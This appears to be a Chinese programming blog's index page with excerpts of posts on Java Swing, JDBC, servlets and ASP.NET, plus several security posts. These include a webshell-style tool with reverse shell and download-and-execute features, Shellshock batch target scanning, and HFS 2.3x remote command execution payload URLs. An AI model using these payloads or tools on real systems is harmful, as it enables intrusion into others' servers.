cat小工具
我觉得这都算不上什么webshell了,写这个只是为了简化一些操作。cat提供了简单的的文件遍历、管理、命令执行、反弹shell、文件下载、自动下载并执行这么几个小功能。 web界面只是一个简单的文件目录浏览功能和文件下载功能: 点击文件名可以编辑对应的文件,新建文件也可以在这里进行File地址写上需要编辑的文件绝对路径就行了: 执行系统命令会比较麻烦,因为需要自己写参数了: 请求:http://...
阅读全文JavaSwing JComboBox模拟html的select标签
JComboBox默认不支持name属性设置,getSelectedItem()默认返回的是String。实际上可以模仿原生的DefaultComboBoxModel实现一个自己的DefaultComboBoxModel。 DefaultComboBoxModel.java package org.javaweb.swing.ui; import java.util.Vector; import ...
阅读全文JavaSwing 简单模拟Mac Finder
为了方便切换,我把Panel和JFrame分开了。之前画了个用的Netbeans,但是感觉毕竟没有手写的方便扩展。 NetBeans画的: 代码写的: MainFrame.java: package org.javaweb.burp.test; import java.awt.Dimension; import javax.swing.JFrame; /** * * @author yz */ p...
阅读全文[Bug更新]Java 反射JDBC ResultSet自动映射成对应实体
[更新]:修复了查询字段映射bug,导致结果集数量=字段*字段数问题。ls.add(c);应该放到for (int i = 1; i < rsm.getColumnCount() + 1; i++) {}外面。 以前一直用Spring的JdbcTemplate查询数据,JdbcTemplate被封装的及其简单易用。某些时候不太适合使用Spring这样庞大的框架,所以自己封装了个JDBC查询的...
阅读全文CVE-2014-6271 google 批量
import java.io.IOException; import java.net.URLDecoder; import java.util.Queue; import java.util.concurrent.LinkedBlockingQueue; import java.util.regex.Matcher; import java.util.regex.Pattern; import ...
阅读全文JDBCTest 命令行下自动load外部数据库驱动并执行SQL语句
保存为JDBCTest.java并编译:javac JDBCTest.java 执行:java JDBCTest com.mysql.jdbc.Driver jdbc:mysql://localhost/test root 123456 "select version()" 参数的顺序是驱动包、url、用户名、密码、sql语句。执行结果: [yz@yz:~]$ java JDBCTest com....
阅读全文URLClassLoader 加载外部jar获取 JarFile(HTTP)问题(JarURLConnection)
当通过URLClassLoader去load一个外部的jar(HTTP)后获取这个jar实体对象会有一点小问题。正常情况下: URL u = getClass().getProtectionDomain().getCodeSource().getLocation(); 即可获取到当前的jar路径,因为是URLClassLoader所以这里拿到的URI可能是HTTP协议。即:http://xxx.c...
阅读全文[转] HFS 2.3x 远程命令执行
从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分: 百度搜HFS默认就是2.3x版本,执行echo测试成功: http://localhost...
阅读全文servlet http异常
response.sendError可以自定义当前页面http错误状态,HttpServletResponse定义了常规的HTTP错误状态码。例如给浏览器返回一个403错误: public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException...
阅读全文asp.net SqlDataSource 预编译 动态SQL搜索
配置SqlDataSource1,搜索的一般需要动态查询,为了解决拼SQL问题,可以采用预编译。参考:SqlDataSource 中 参数动态赋值的方法 和 使用 SqlDataSource 进行带参数的查询 protected void Button1_Click(object sender, EventArgs e) { string id = TextBox1.Text.ToString()...
阅读全文